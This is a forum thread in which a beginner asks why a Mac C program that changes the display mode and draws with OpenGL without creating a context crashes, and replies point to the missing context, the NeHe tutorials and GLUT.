“Call System::release to close the output device and free all memory associated with that object. Channels are stopped, but sounds are not released. You will have to free them first. You do not have to stop channels yourself. You can of course do it if you want, it is just redundant, but releasing sounds is good programming practice anyway. ”
The second sentence seems to make clear that sounds are not released automatically, and must therefore be tracked and released manually before the system. This seems counter intuitive though, and the last sentence adds to the confusion.
Hey David,
It looks like you are right, I went back to the FMOD documentation last night and saw those paragraphs too. But if you go to the documentation for System::close(), which is called by System::release(), it says:
“Closing the output renders objects created with this system object invalid. Make sure any sounds, channelgroups, geometry and dsp objects are released before closing the system object.”
So it would appear that while you don’t have to release the channels, you do have to release the sounds. Well spotted! I will update the blog post when I get a moment.
Oh, I’m also glad you just quoted that bit from the close() method, since it made me notice that channel groups also need to be released. I made the assumption that they worked the same as regular channels and did not need to be released.
Blog post updated, thanks 🙂
By the way, if you ever feel like writing another part for this series, one thing that you could describe is how to write directly to the audio buffer for some low level audio programming.
I already had some experience doing that in other APIs such as XNA and Flash, but it took me more time than it should to figure out how to do it in FMOD – I couldn’t find much about it in the documentation, and forgot to look into the example projects. For the record, here’s what I did.
The process turned out to be creating a *looping stream* with the FMOD_OPENUSER flag and a custom FMOD_CREATESOUNDEXINFO object using a PCM read callback set to write the data to it.
Besides this callback, I also needed to specify the size of the info structure, the format of the audio (e.g. PCM16 or PCMFLOAT), the default frequency (44100), the number of channels (2), the size of the decode buffer (depends), and the length of the stream, which I set to the equivalent of five seconds of audio (frequency * bitrate * channels * 5).
I’m always open to suggestions 🙂 Although it depends mostly on my time and health (the last 2 years, mostly the latter). I’ve never tried that in FMOD but I’m glad you threw in some pointers to save me the head-scratching if I do decide to write about that. I’ve done that in one API and it was many years ago (might have been a WAV writer for Winamp, can’t quite remember), I seem to remember it was basically a case of running it in a separate thread and making sure the buffer never under-ran.
If you really want me to blog about that for others and you have a source code sample, feel free to post it on pastebin and I’ll re-factor it with comments and explanations. No promises on a timeline 🙂
I did not get around to implementing any significant sample for this, as I was mostly just playing around. But the following FMOD official example is a good starting point, although it can be trimmed a lot.
And here’s the callback I used to produce a sine wave with controllable volume and frequency (in this case it was in C#):
Doesn’t look as traumatic as I was expecting. I’ve saved the source files so I may take a look at that when I’ve caught up with all the platform game articles. Thanks!
I’ve spent the night writing a couple of nice clean examples using the official demo code, your C# example, and some other bits and pieces I found on the interwebs, and added some other example sounds (sawtooth, square wave and white noise). I’ll get around to blogging it in the next few days hopefully 🙂
Could you tell me if there is any C++ specific gotcha which would make it preferable to do:
FMOD_RESULT result = whatever();
FMODErrorCheck(result);
Instead of:
FMODErrorCheck(whatever());
Or is it just a matter of style?
Unless you want to use result later (in which case you need to do the first version), or you want to be really pedantic about allocating 4 bytes on the stack until result goes out of scope, it is as far as I know purely a matter of personal preference 🙂
Any idea whether it’s possible to drive 2 soundcards with 1 FMOD program?
I haven’t tried it but I believe that is perfectly possible. You just need to create (as far as I know) multiple instances of FMOD::System and assign each one to a different sound card. The documentation for System_Create states “Use this function to create 1, or multiple instances of FMOD System objects” which I assume means you can run more than one FMOD engine from the same process. Presumably any sounds you want to play on two or more sound cards have to be loaded twice or more as each sound is owned by a single FMOD::System instance, but I haven’t checked.
Call System::getNumDrivers to get the number of (logical) sound cards on the system, ie. the number of outputs. Call System::getDriverInfo to get the name of each device. Each device has an ID in FMOD from zero to n-1 where n is the output of System::getNumDrivers. When you have selected the sound cards you want to use, call System::setDriver(int driverID) to re-direct all output to the desired device.
Hope that helps!
Realizing it’s been almost exactly a year, note that I’ve tried this only today, and indeed it works! I have 2 soundcards and am able to drive both independently this way.
Wow, a year already, feels like I wrote this article last month! Good to know it works that way 🙂
Hello, I’m a student from South Korea. I am trying to use FMOD in the platform of MFC.
This is Almost my first time of using a library such as FMOD.
My first goal is to Play a music of Audio.mp3. I have saved a music file named Audio.mp3 in my Project folder. However, error occured when I’m using the function system->createSound / createStream / playSound
My first prediction was that, I couldn’t understand of including Post Built Event. copy /y “C:\Program Files (x86)\FMOD SoundSystem\FMOD Programmers API Windows\api\fmodex.dll” “$(OutputPath)”
Eventhough I have Copied my Post Built Event same as above, an error was sent in the OutputPath. Do i need to Change the OutputPath?
If the Post Built Event had nothing to do with compliling, what should have been the problem..? I’d be waiting for your advice. T_T..
void CMy111Dlg::OnBnClickedButton1()
{
InitFMOD();
}
void CMy111Dlg::ERRCHECK(FMOD_RESULT result)
{
CString strText;
if(result!=FMOD_OK)
{
strText.Format(_T(“FMOD 오류”),FMOD_ErrorString(result));
MessageBox(strText,_T(“FMOD error!!”),MB_OK);
num++;
exit();
}
So, did it compile or not? And what was the error?
Also the code contains a call to ‘versioncreateSound’; that won’t compile ofcourse (but that seems too trivial to be your problem).
I’ve copied another source of mine. The source i’ve used);
}
In the compiling process there was no errors. However, when i executed my program.
The ERRCHECK(result) function sent me that a problem had occured during createSound / createStream / playSound.
If i had the ERRCHECK(result) line deleted and executed my program.
A popup messagebox was sent that there was a critical problem and the program was terminated.
Thank you for replying 🙂
I’ve used result = system->createSound(“Audio.mp3”, FMOD_DEFAULT, 0, &audio); !!!!
when i Post my comment it is transfered to if(versioncreateSound……. I don’t know why;;
Ok, but also this:
result = system->playSound(FMOD_CHANNEL_FREE, audio, false,0);
I’m not sure sure if playSound() accepts a 0 for the channel to return. Better to pass &channel rather than 0. I debug mode you should get a call stack where you can check which call (in your code) exactly gave the crash, so you can check the arguments/variables being used.
I’ve found my problem;……
My Audio.mp3 file was named incorrectly..T_T
When I have another problem I’d like adivce.
Heya there! I’d like to ask a simple question( but with a possible complex answer). I’ve been following this tutorial, but half-way through I stopped because it’s late at night and I don’t want to waste time.
My simple purpose was to have a car engine acceleration done that I could control how I’d like. Through a couple of google searches I’ve arrived at this tutorial:
This prove to be a promising path to follow, so I ended up having some engine sounds and doing that. Next I downloaded the API.
The problem is that I want to somehow integrate the Designer project with a C++ program written with the FMOD API. Is this easy or really hard? As in the video, I would only need to control the “RPM” value. Can you point me to some resources\tutorials or if it isn’t that hard, can you please suggest me something from the reference?
Please keep in mind that I’m quite a beginner.
I’m sorry, I don’t have any experience with the FMOD Designer, only the code side… perhaps another reader can help you 🙂
It’s not that hard, but not particularly easy.
I would recommend checking the official car engine sample that comes with FMOD Designer and reading the documentation. If I remember correctly, the sound event is composed by two layers – one for when the engine is under load (i.e. accelerating), and another for when it is not (i.e. decelerating). Then there is a “load” parameter that you set from your game which determines which of the two layers should be used, with a 50/50 mix of both in the middle. Then, on the horizontal axis comes the “rpm” parameter. There are four or five different sounds recorded at different rpm values, all placed side by side on the layers. These sounds overlap a bit and cross-fade so that the transitions are smoother, and they use the “auto-pitch” feature of FMOD Designer which basically increases the pitch gradually based on the value of the “rpm” value.
So, what I suggest is that you start with the official car engine sample that comes with FMOD Designer, save that in a project and load the project into your game. Then what you need to do is update the “rpm” and “load” parameters based on values coming from your game. The main problem will probably be making the rpm and load values vary consistently and in a realistic fashion.
Loading a FMOD designer project, playing a sound event and changing parameters is easy and very similar to initializing the regular audio system and playing a regular sound. It’s something like:
// Create an event system object
FMOD::EventSystem* eventSystem;
FMOD::EventSystem_Create(&eventSystem);
// Initialize the event system and load the project
eventSystem->init(100, FMOD_INIT_NORMAL, 0, FMOD_EVENT_INIT_NORMAL);
eventSystem->load(“project.fev”, 0, 0);
…
// Get a reference to the event
FMOD::Event* event;
eventSystem->getEvent(“ProjectName/EventGroupName/EventName”,
FMOD_EVENT_DEFAULT, &event);
// Begin playing the event
event->start();
…
// Get a reference to the parameter
FMOD::EventParameter* parameter;
event->getParameter(“ParameterName”, ¶meter);
// Change the value of the parameter
parameter->setValue(2.0f);
…
// Update event system every frame
eventSystem->update();
// Release event system when we are done
eventSystem->release();
Is there a way to tell when a sound finishes playing in FMOD?
Love the blog btw Katy
Yes, you can poll the channel on which the sound is being played with Channel::isPlaying(bool *playing) which sets the pointer to false when the sound has finished playing. You need to fetch the sound’s channel when you call playSound() to be able to poll the correct channel.
Thanks for the compliments!
There’s also an event based solution 🙂 Use the Channel::setCallback() method to register a callback on the channel that is playing the sound. Then there is a parameter on your callback function which tells you the type of the callback, and all you have to do is check if it corresponds to FMOD_CHANNEL_CALLBACKTYPE_END and handle it accordingly.
Nice. I was looking in the docs for the previous poster for an event but I looked at FMODCREATESOUNDEX or whatever it’s called and couldn’t find one.
Trying to use your tutorial to get started… The FMOD_CAPS is reading as undefined. I have tried including all the headers in the fmod pack but it is still not working. Do you know which header this thing is in?
You should include the main header fmod.hpp (for the C++ interface), that’s the only one you need and FMOD_CAPS will then be defined 🙂
I have included fmod.hpp, FMOD_CAPS is still not working for me.
Then I could only suggest that your download was somehow corrupt. Uninstall the FMOD API altogether and download the latest version from fmod.org and try again. I promise you that FMOD_CAPS is defined in that header 🙂
I still can’t get FMOD_CAPS to respond. Perhaps you can tell me how to properly install/link the fmod API files to VS2012 (I am making a game with openGL atm), I did see some .a files in the low-level api folder, I don’t know what to do with those. Currently, I am simply putting the fmod folders into my c/program files(x86)/VC/bin, etc. Is there something else I need to do?
Define ‘not working’? In C++ I do this:
FMOD_CAPS caps;
// Try to use system default speakermode
fmodSystem->getDriverCaps(0,&caps,0,&systemSpeakerMode);
The FMOD_CAPS type comes from fmod.h. If you want to check if you’re including that .h files, why not insert an #error line somewhere? At the top should give you a clue whether you’re including the right file. Near the ‘FMOD_CAPS’ typedef in fmod.h would give you a clue whether the preprocessor gets to the typedef.
By not working, I mean that VS is reading FMOD_CAPS as undefined, even though I have #include “fmod.hpp”, which should have “fmod.h” (I’ve tried including “fmod.h” too without success). How would you use an #error line? I haven’t heard of this feature before.
#error works just like the other #’s (#ifdef etc). So you get:
#ifdef FMOD_H
#error we are here
#endif
This gives a compiler error, which is useful in tracking which (if any) part of the .h is actually processed. This can give clues as to why it never passes the FMOD_CAPS line. If you don’t get an error at all even if you put an ‘#error’ line at the top, this means you’re not including the file that you think you are!
Note that I use this in Visual Studio; not sure if other compilers support it. Very handy though.
I downloaded the demo, tried to run it and got
Any idea why?
Probably that you tried to compile it as a Windows application so it was looking for WinMain() as the entry point. Change the configuration to Console application instead.
Sounds like you didn’t include WinMain() in your project – which you don’t need because the example is a console application, so just change the project type to Console Application and you should be good to go 🙂
Katy.
Hello again, Katy!
I wonder if you could help me – programming in Linux with FMOD worked fine for me, but now I wanted to try to port my code onto Windows. So I changed some Linux’s functions to ones working under Windows, pasted whole code into Visual Studio 2010. Then I included everything as you have said at the beginning of this tutorial to MVS. I also included stdafx.h at the beginning of all includes due to the fact that precompiled headers should be included that way.
Nonetheless, building solution still won’t work. I’m getting errors like:
And then a lot of errors pertaining to not being able to identify used FMOD functions. I have never used Visual Studio before so I need someone’s guidance with my problem. What should I do?
Thank you in advance.
Winged
Problem solved. I did not notice that I’d included fmod.h instead of fmod.hpp ;x
hey, I copy pasted your demo but I don’t hear any sound. No errors, it compiles and everything, I just can’t hear the .mp3 I specified ! any clues ? great blog btw !
Check that the demo is outputting the sound on a channel on your sound card that you can actually hear, ie. the front speakers or headphones 🙂
how do you do that ? with
system->playSound(FMOD_CHANNEL_FREE, audio, false,0);
?
thanks!
Enumerate the playback drivers and check their names to see which one corresponds to your speakers/headphones. I haven’t tested this code but try something like:
Once you’ve found the ID of the driver you want to output on, use:
Note that a value of 0 (zero) uses the OS-default driver as determined in your sound settings in Control Panel.
Katy.
Hello,katy,i come from China and i am just confused about the statement ” while (GetAsyncKeyState(‘2’));” and so on.Could you give me some details about it?
That line simply stalls the code until the user releases the ‘2’ key, so that the action of pressing 2 is only triggered once each time it is pressed rather than repeatedly. Hope that helps!
Hi, Katy i have configure all the above settings in my VS2013 but still am getting an error message can you help me out on this….
1>—— Build started: Project: again1, Configuration: Debug Win32 ——
1> Parse Error
1> The filename, directory name, or volume label syntax is incorrect.
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: The command “xcopy /y “C:\FMOD\
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: api\fmodex.dll” “c:\users\hack1on1\documents\visual studio 2013\Projects\again1\Debug\”
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(122,5): error MSB3073: :VCEnd” exited with code 123.
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
It’ll be great if you can find out the solution…. Regards
Here’s the step i did with my VS2013 Am I missing something?? And i did copy and paste “fmodex.dll” in my working folder… But still am getting an error link like identifier not found, undeclared identifier and so and so….please help…
First step =
Second step =
Third step =
Final step =
here’s the other trouble am having for a quite long time
And to be totally honest i don’t think am having a problem linking my library file’s cause am getting a perfect output
| https://katyscode.wordpress.com/2012/10/05/cutting-your-teeth-on-fmod-part-1-build-environment-initialization-and-playing-sounds/ | CC-MAIN-2018-17 | refinedweb | 5,549 | 60.85 |
I've been encountering an issue with the Swift REPL for a while now, and chalked it up to being some kind of issue with my local environment. That is, until I got a new computer and the issue was happening there too. This has been happening consistently with Swift 5.2.4/Xcode 11 and Swift 5.3/Xcode 12. Stranger still, it used to not happen with Swift 5.2.4 - but then just started seemingly out of nowhere.
The Swift REPL consistently complains when I try to import SwiftPM modules, saying that it can't lookup the symbols. This is strange, but the code has no problem running in tests — just the REPL.
Here's a quick example of how to maybe reproduce this. For me, it happens with any SwiftPM library, so the specific one doesn't matter.
$ mkdir Example $ cd Example $ swift package init --type library
Edit Sources/Example/Example.swift to look like so:
public struct Example { var text = "Hello, world!" public init() {} }
Next, launch the REPL.
$ swift run --repl ... 1> #if canImport(Example) 2. print("Proceed") 3. #endif Proceed 4> import Example 5> let example = Example() example: Example.Example = { text = { _guts = { _object = { _countAndFlagsBits = <extracting data from value failed> _object = <extracting data from value failed> } } } } error: Couldn't lookup symbols: Example.Example.init() -> Example.Example Example.Example.init() -> Example.Example
It's really strange, isn't it?
If it's helpful I can include a log of what LLDB logs, but it's a lot. Let me know if anyone else is having this issue or what I can do to fix it! Thanks. | https://forums.swift.org/t/is-this-repl-issue-a-bug-or-specific-to-my-environment/40659 | CC-MAIN-2021-31 | refinedweb | 270 | 59.19 |
It seems like there are three things going on here:
1. Customizing classes
2. Access privileges
3. Directory inheritance
I think 1. definitely goes into the existing
WebKit/Configs/Application.config file. It would also be cool if WebKit
would automatically pick up and use classes in applications that had the
same name. E.g., you could just make a Session class that inherits from
WebKit.Session and it would be used by convention of its name. This
wouldn't replace the configuration capability; it would just be a convenience.
Note that application does take arguments for the various classes and
stores them as attributes. It then uses those when creating new sessions,
requests, etc. So we're half way there. It's the config that's missing (as
Dan has pointed out).
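To make the pick-up-by-name convention concrete, here is a rough sketch. The names and the lookup mechanism are my guesses for illustration only — this is not actual WebKit code:

```python
class Session:
    """Stand-in for the framework's default WebKit.Session."""
    kind = 'default'

def pick_session_class(app_namespace):
    # If the application defines its own Session class, use it by
    # convention of its name; otherwise fall back to the default.
    cls = app_namespace.get('Session', Session)
    if not issubclass(cls, Session):
        raise TypeError('Session must subclass the framework Session')
    return cls

class WebMailSession(Session):
    """What an application like Dan's Webmail might define."""
    kind = 'webmail'
```

The config option would still exist for people who want an explicit mapping; the by-name lookup is just the zero-configuration default.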
2. Access priv.: Not really sure how this should work. I certainly don't
mind if someone takes a crack at it. Does this mean having classes like
Role, User, etc.?
Or is using the authentication of the HTTP server possible and sufficient?
3. Directory inheritance: A Zope-/Quixote-inheritance scheme could be a
useful thing, although there's obviously a performance hit for such things
(e.g., scanning through each directory). That's why I prefer to use class
inheritance rather than directory inheritance: It's all in memory and
generally faster. But I can still see the utility of directory inheritance
for easier configuration and better file system organization.
To get started, it might be useful to create a Page class/mix-in that
offers methods such as:
property()
setProperty()
object()
setObject()
That are able to use files in directories under predetermined conventions.
I'm picturing that properties are dictionary oriented, with the closest
dictionaries being overlayed as you travel up the directory chain. In each
directory there would be a Properties.config file. You would want to cache
these and check the timestamps to have an efficient process while still
having the ability to update them on disk at any time.
The objects would be larger things like graphics files or HTML fragments
that are searched for up the directory chain and found according to
filename. These could also be cached by time stamp.
You could also map extensions to Python classes, so that when an object is
asked for, the class is instantiated with it and that's what you get.
For properties, you could special case dictionaries that have a key called
'class'. For such dictionaries, the dictionary would be replaced by an
instance of the class which would receive the readProperties() message.
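A rough sketch of that property overlay might look like the following. The filename, the dict-literal format and the search order are all assumptions for illustration, not an actual WebKit API (and a real version would cache by timestamp as described above):

```python
import os

def read_properties(root, rel_path, filename='Properties.config'):
    """Merge Properties.config files from `root` down to `rel_path`;
    files in closer (deeper) directories override those above them."""
    props = {}
    current = root
    for part in [''] + [p for p in rel_path.split('/') if p]:
        if part:
            current = os.path.join(current, part)
        cfg = os.path.join(current, filename)
        if os.path.exists(cfg):
            with open(cfg) as f:
                props.update(eval(f.read()))  # closer dirs win
    return props
```

A page at Main/Webmail would then see the site-wide properties with anything redefined in Main/ or Main/Webmail/ layered on top.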
These are just some brainstorming ideas on my part to warm up the conversation.
With regards to 2 & 3, what I'd really like to see are WebKit plug-ins
rather than a new versions of WebKit.
The reasons are:
* Plug-ins can be developed independently of each other.
* People can then embrace as much or as little of the services we
provide as what they want.
* People can provide alternative versions of our services if they think
they know how to do it better/faster.
* Continuing with the plug-in architecture will encourage more plug-ins
and Webware will evolve faster.
I'm more than willing to guide people in creating plug-ins. It's really
just a small set of conventions for laying out your directories and files
and making a function that lets you hook into WebKit at load time.
With regards to config files, I definitely prefer good ol' Python
dictionaries rather than a custom format. Python config files allow for
infinitely recursive dictionaries and lists and the only thing we have to
do is eval().
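For example (the keys here are made up for illustration, and eval() of course trusts whoever wrote the file):

```python
# A config file is just the text of a Python dictionary; reading it is
# a single eval(), and nested dictionaries and lists come for free.
source = """
{
    'Contexts': {'default': 'Examples', 'admin': 'Admin'},
    'Plugins':  ['PSP', 'KidKit'],
    'Debug':    {'Sessions': 0},
}
"""
config = eval(source)
```

No parser to write, no custom grammar to document -- the config format is the language itself.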
Again, if people want to take a crack at plug-ins like this, I will
certainly lend you a hand in ideas, testing, reviews, tech help on Webware,
etc.
Provided something is produced that is useful, tested, documented and
follows Webware conventions, we could put it in and you could acquire fame
and fortune. Well, at least fame. :-)
Thoughts?
-Chuck
I was thinking of writing something similar to Apache's .htaccess, to
provide things like:
- Class names for Application, Session, etc. so that people can subclass
these and then let WebKit know to use their own classes
- Access privileges (automated authentication handlers? that would rule...)
A typical config would look like:
[/Main/Webmail]  # if you were writing a Webmail component ... I know I'm not :)
ApplicationClass = WebMailApplication
SessionClass = WebMailSession
Authenticator = WebMailAuthenticator
or, if we prefer to use just plain ol' Python:
from WebMailLib import *
{
    '/Main/Webmail': {
        'ApplicationClass': WebMailApplication,
        'SessionClass': WebMailSession,
        'Authenticator': WebMailAuthenticator,
    }
}
Of course, this is all easily extensible, so future config options are
possible. Alternatively, we could read them in per-directory, so that
/Main/Webmail would just be implied by its location in
/.../WebKit/Main/Webmail. I think it's something that needs to be done
eventually, and I'm offering. :)
I think that it should be recursive a-la Zope, such that config directives
for /Main/Webmail are assumed for /Main/Webmail/POP and /Main/Webmail/IMAP,
for example.
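That recursive lookup is easy to express: collect every configured section whose path is a prefix of the requested one, letting the most specific section win. A sketch (plain strings stand in for the class objects above):

```python
def directives_for(path, config):
    """Merge config sections whose path is a prefix of `path`,
    applying longer (more specific) sections last so they override."""
    merged = {}
    for prefix in sorted(config, key=len):
        if path == prefix or path.startswith(prefix.rstrip('/') + '/'):
            merged.update(config[prefix])
    return merged
```

With this, /Main/Webmail/POP inherits everything from /Main/Webmail and overrides only what it declares itself.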
Let me know what format would be best, what config options should be done
ASAP, etc.
Or is there a facility for doing this that I just haven't noticed yet?
Dan Green
At 12:59 PM 8/19/00 -0700, Weiss Blitz wrote:
Thanks for the compliments.
...
My preferred method for caching such things is to subclass Application.
Unfortunately, there is no setting right now to tell WebKit to use your
subclass, so you have to tweak the "createApplication()" method of AppServer
to use it.
This might be interesting. I've actually only been caching things in pages
right now, so we'll see how the details fall out.
Another technique is to put an __init__.py in your context and add a
method to Application:
__init__.py:
---
def news(self):
    if not hasattr(self, '_news'):
        self._news = magicalNewsGrabber()
    return self._news

from Application import Application
Application.news = news
---
Now in your pages, you can say:
self.application().news()
And get the object (which I presume is a list containing news records/objects).
I know Jay likes the Cans technique, but my preference is to simply have
methods named after the appropriate objects they return, accessible in
either my page or my application.
Another good technique, regardless of this, is to create a SitePage class
that inherits from WebKit's Page. In this page, you put specific utilities,
services, data, etc. to your web site and make all other pages inherit it.
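A tiny sketch of that pattern (a stand-in Page class is used so the example is self-contained; in Webware you would inherit from WebKit's real Page, and the method names below are illustrative):

```python
class Page:
    """Stand-in for WebKit's Page base class."""

class SitePage(Page):
    """Site-wide base page: shared utilities, look-and-feel, and data
    helpers live here, and every page on the site inherits from it."""
    def siteTitle(self):
        return 'My Site'
    def writeHeader(self):
        return '<h1>%s</h1>' % self.siteTitle()

class NewsPage(SitePage):
    """An individual page overrides only what differs."""
    def siteTitle(self):
        return 'My Site - News'
```

Changing the header markup in SitePage then changes it everywhere at once.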
BTW, are you using the 0.3 distribution or the CVS repository?
>Also, this might sound dumb, but, what is your
>favorite IDE or editor under Linux to develop Python
>apps? Kedit and Kwrite don't cut it and emacs is too
>foreign to me (I don't want to go thru the learning
>curve of new editing ctrl-c+???? commands).
My development environment is:
* Windows 98
* Ultra-Edit ()
* Python 1.5.2
* Webware (latest snapshot)
* Internet Explorer 5.01
* OneShot adapter
My deployment environment is:
* FreeBSD
* Py 1.5.2
* Webware
* OneShot adapter (soon to be WebKit adapter)
I really like this setup. I find the Windows desktop much more productive
than I did the Linux desktop. I find BSD to be the best server side
operating system.
>Keep up the good work guys!
Speaking of which, we'll be releasing a 0.4 "sometime real soon". We're
still squashing the final bugs and beefing up the docs.
Also, you will have lots of questions as you develop your app. Feel free to
continue asking.
-Chuck | http://sourceforge.net/p/webware/mailman/webware-discuss/?viewmonth=200008&viewday=20 | CC-MAIN-2014-41 | refinedweb | 1,278 | 57.67 |
How to Simulate Key Presses in Python
I have been searching the web but have been unable to find ANYTHING that is for Linux and that can type sentences, not just letters. I have a Tkinter textbox and I have been trying to find out how to make the program be able to type in the Tkinter textbox. For solutions, I have found things like the SendKeys module but these don't work as they are only for Windows. So if anyone knows how to make python code be able to type in a Tkinter textbox, or know a module that simulates keypresses in python, PLEASE let me know. Thanks!
is this good?
If that doesn't work, then try pyautogui
If neither work, that means repl.it is bad, and you should report to bugs
gl@Futuristics
send repl@Futuristics
aweesome gl@Futuristics
send the error@Futuristics
  File "main.py", line 5, in <module>
    import pyautogui
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/pyautogui/__init__.py", line 242, in <module>
    import mouseinfo
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/mouseinfo/__init__.py", line 223, in <module>
    _display = Display(os.environ['DISPLAY'])
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/display.py", line 80, in __init__
    self.display = _BaseDisplay(display)
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/display.py", line 62, in __init__
    display.Display.__init__(*(self, ) + args, **keys)
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/protocol/display.py", line 53, in __init__
    name, host, displayno, screenno = connect.get_display(display)
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/support/connect.py", line 62, in get_display
    return mod.get_display(display)
  File "/opt/virtualenvs/python3/lib/python3.8/site-packages/Xlib/support/unix_connect.py", line 47, in get_display
    raise error.DisplayNameError(display)
Xlib.error.DisplayNameError: Bad display name "MAGIC"
oh, use pygame instead@Futuristics
oh wait you are already on a repl that has a pre-built display?@Futuristics
so pygame and tkinter repls have a built-in display@Futuristics
oh, make a tkinter repl@Futuristics
Error:
Repl.it: Installing fresh packages
ERROR: Can not perform a '--user' install. User site-packages are not visible in this virtualenv.
WARNING: You are using pip version 20.1.1; however, version 20.2.3 is available.
You should consider upgrading via the '/opt/virtualenvs/python3/bin/python3 -m pip install --upgrade pip' command.
Repl.it: package installation failed! | https://replit.com/talk/ask/How-to-Simulate-Key-Presses-in-Python/56681?order=votes | CC-MAIN-2022-27 | refinedweb | 406 | 52.76 |
Setting up OpenGL (was: XCode's fault or Mine?)
so, when I try and like build and run this code in XCode (Carbon Application) XCode "unexpectedly quits"
The code is as follows:
----------------
Code:
#include <Carbon/Carbon.h>
#include <OpenGL/gl.h>
#include <OpenGL/glu.h>
#include <OpenGL/glext.h>
CFDictionaryRef newMode;
CFDictionaryRef originalMode;
size_t desiredBitDepth = 32;
size_t desiredWidth = 1024;
size_t desiredHeight = 768;
boolean_t exactMatch;
int main() {
originalMode = CGDisplayCurrentMode( kCGDirectMainDisplay );
newMode = CGDisplayBestModeForParameters (
kCGDirectMainDisplay,
desiredBitDepth, desiredWidth,
desiredHeight, &exactMatch);
if (NULL != newMode) {
CGDisplayCapture( kCGDirectMainDisplay );
CGDisplaySwitchToMode ( kCGDirectMainDisplay, newMode);
CGDisplayHideCursor( kCGDirectMainDisplay);
glClearColor( 0,0,0,1);
glClear( GL_COLOR_BUFFER_BIT);
glColor3f(0.0f, 1.0f, 0.0f);
glBegin( GL_TRIANGLES); {
glVertex3f (-1.0f, 1.0f, 0.0f);
glVertex3f (1.0f, 1.0f, 0.0f);
glVertex3f (0.0f,-1.0f, 0.0f);
}
glEnd();
glFlush();
CGDisplayShowCursor( kCGDirectMainDisplay);
CGDisplaySwitchToMode( kCGDirectMainDisplay, originalMode);
CGDisplayRelease( kCGDirectMainDisplay);
}
return 0;
}
It has been a while since I messed with OpenGL, but as far as I can tell you never create an OpenGL context. Needless to say, if that is the case then it is the cause of your crash.
Moderator
Posts: 3,591
Joined: 2003.06
I don't know, but after a quick glance through your code I can see there are several problems with it -no context, no drawing loop!, etc. I would highly recommend going to and reading through some of the tutorials there. I think the first few are in Carbon so that should help out.
and ah, how do you set up said OpenGL context? I've been to NeHe but what they tell you to do to set up a rendering context etc. doesn't work and is apparently PC code.
Also, this thread probably should've been started in the OpenGL forum, so sorry.
sorry for my n00bishness =)
-Mark
Moderator
Posts: 3,591
Joined: 2003.06
I just checked the NeHe code for you and it's either GLUT or Cocoa, although GLUT is Carbon. Go GLUT to begin with. You won't need to set up a context for GLUT since it handles that for you automatically. NeHe does indeed have most of the lessons downloadable for the Mac so don't be misled. You'll only have to read through minimal PC oriented tutorial stuff. The actual Mac download will contain the corrected code that you are interested in and you can extrapolate from there with relative ease. Here's the link to learn how to set up GLUT for OS X: It's a little out of date but if you have any questions about it I'm sure someone can help you here. Be sure to look at the bottom of each lesson to find the relevent Mac code download.
Okay guys, thanks for all your help but I've decided to go in a slightly different direction. I'm going to like get a better grasp of C, then learn Cocoa, and then do OpenGL through that.
Well, that's this week's plan, at least ^^
-Mark
Good plan. OpenGL programming is unlike other programming on OS X, because it has the tendency to freeze or kernel panic your entire machine. You also *have to* check your results on several different machines, because every video card renders a little bit differently. Get comfortable with regular programming first.